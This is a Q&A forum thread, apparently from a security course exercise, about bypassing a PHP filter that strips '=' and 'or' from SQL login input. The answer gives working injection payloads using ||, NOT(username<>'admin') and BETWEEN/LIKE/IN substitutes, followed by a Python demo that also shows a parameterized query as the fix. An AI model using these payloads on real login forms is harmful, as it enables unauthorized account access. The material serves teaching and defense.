SQL injection with php filtering

孤街浪徒 2021-01-16 20:54

I have to inject a login form as an exercise for a computer security course.... I have passed the first level using the simple

\' like 1=1--
1 answer
  • 2021-01-16 21:59

    Assuming this definition of lvl2_filter, which basically removes any occurrence of = and or until no longer found, it should still be possible to use the logical OR operation with || instead of OR and a simple expression that evaluates to true like:

    username: dummy
    password: ' || '1
    

    This would result in:

    SELECT user_id FROM users WHERE username='dummy' and password='' || '1'
    

    For selecting a specific user, one can use the rules of boolean algebra, where x=y = !(x!=y):

    username: dummy
    password: ' || NOT(username<>'admin') AND '1
    

    This would result in:

    SELECT user_id FROM users WHERE username='dummy' and password='' || NOT(username<>'admin') AND '1'
    

    Here <> is equivalent to != but doesn’t contain a =.

    There are also other operations that one could use to ensure username equals admin:

    • username BETWEEN 'admin' AND 'admin'
    • username LIKE 'admin'
    • username IN ('admin')
    • IF(STRCMP(username,'admin'), 0, 1)
    • CASE STRCMP(username,'admin') WHEN 0 THEN 1 ELSE 0 END
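
    The answer's reasoning, as an added example (not code from the original post or the course): a Python reconstruction of the described blocklist filter, showing at string level that the payloads above pass it unchanged and yield exactly the queries quoted in the answer, beside the parameterized lookup that removes the problem. The filter's exact implementation, the table contents and the passwords are assumptions; `||` is logical OR in MySQL (which the answer relies on) but string concatenation in SQLite, so only the parameterized query is executed against the in-memory database.

```python
import re
import sqlite3

# Assumed reconstruction of the level-2 blocklist filter the answer describes
# (the page does not show its source): strip '=' and 'or' (case-insensitive)
# repeatedly until neither remains, so "o=r" does not collapse into "or".
def lvl2_filter(value: str) -> str:
    while True:
        stripped = re.sub(r"or", "", value.replace("=", ""), flags=re.IGNORECASE)
        if stripped == value:
            return value
        value = stripped

# The vulnerable pattern: filtered input is still spliced into the SQL text,
# so anything the blocklist does not catch becomes part of the query.
def build_vulnerable_query(username: str, password: str) -> str:
    return ("SELECT user_id FROM users WHERE username='%s' and password='%s'"
            % (lvl2_filter(username), lvl2_filter(password)))

# Hardened form: the same lookup with bound parameters, so input is only data.
def safe_lookup(conn: sqlite3.Connection, username: str, password: str):
    row = conn.execute(
        "SELECT user_id FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# Constructed sample table with placeholder credentials.
def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret-placeholder"), (2, "dummy", "dummy-pw")])
    return conn

if __name__ == "__main__":
    # The level-1 payload loses its '=' and no longer reads as intended.
    print(lvl2_filter("' like 1=1--"))
    # The answer's payload contains neither '=' nor 'or', so it passes untouched.
    print(build_vulnerable_query("dummy", "' || '1"))
    # With parameters the same string is just a wrong password: no row.
    print(safe_lookup(make_demo_db(), "dummy", "' || '1"))
```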